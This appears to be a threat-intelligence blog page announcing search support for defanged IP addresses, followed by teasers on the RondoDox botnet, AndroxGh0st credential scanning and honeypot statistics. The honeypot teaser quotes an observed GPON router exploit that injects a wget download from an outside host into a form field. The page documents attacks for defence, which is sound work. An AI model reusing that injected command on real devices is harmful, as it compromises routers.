Skip to main content

Search Update: Support for Defanged IPs

More frequently, we find a need to Fang IP addresses before they can be searched on the site. For those not familiar with the term, check out IOC Fang: Indicator of Compromise (De)Fanging Project.

Here's an easy way to think of it, something with fangs could have a negative impact (e.g. inadvertently clicking a link), versus something that is defanged would not have a negative impact if clicked. A quick breakdown of the concept is as follows:

  • Fanging:
    • 195.54.160[.]149 -> 195.54.160.149
  • Defanging:
    • 195.54.160.149 -> 195.54.160[.]149

On our backend, indicators are stored in a Fanged format. However, since users will come across indicators on various platforms, there is no guarantee on whether or not the indicator will be Fanged or Defanged. Therefore we have enabled searching for Defanged IP addresses that use square brackets  natively from our homepage.  Please note, the bulksearch and API based lookup methods still only support Fanged IP addresses at the time. 


Comments

Popular posts from this blog

RondoDox Botnet: Rando In Your Router

The RondoDox botnet is a network of compromised Internet-connected devices, including MIPS-based embedded systems such as routers and IoT devices. Our honeypot data has observed attempts by RondoDox to compromise  systems, demonstrating exploitation of vulnerabilities or weak credentials to gain control over devices that can then be used for activities like DDoS attacks, spam campaigns, credential stuffing, or illicit cryptocurrency mining. Since June 2025, Sicehice has seen an uptick in exploitation of common router CVEs that lead to RondoDox botnet infections. The malware itself infects the target device with a dropper-like shell script which facilitates the download of a final stage payload. Sicehice observed the first evidence of RondoDox as early as 2025-06-04 02:43:31. The following source IP addresses are the origination point of the activity: IP AS Country 45.135.194.11 AS 51396 (Pfcloud UG) The Netherlands (NL) 45.135.194.34 AS 51396 (Pfcloud UG) The Netherlands (NL) ...

AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st . Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework. One feature of AndroxGh0st is the ability to search for exposed AWS credentials, namely looking for AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS has gone through efforts to continually scan GitHub for AWS key pairs and automatically apply the AWS managed policy AWSCompromi...

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022 and we are also pushing our detection feed to VirusTotal Collections . Approaching one year of of collections, here are some observations and stats: Locations where sensors are deployed: Sydney, AU Madrid, ES Amsterdam, NL Moscow, RU (which was forcibly shutdown due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine) Chicago, US New Jersey, US Iowa, US We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.   An example of this exploit observed in the POST body which targets GPON home routers (CVE-2018-10561) is as follows: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.24...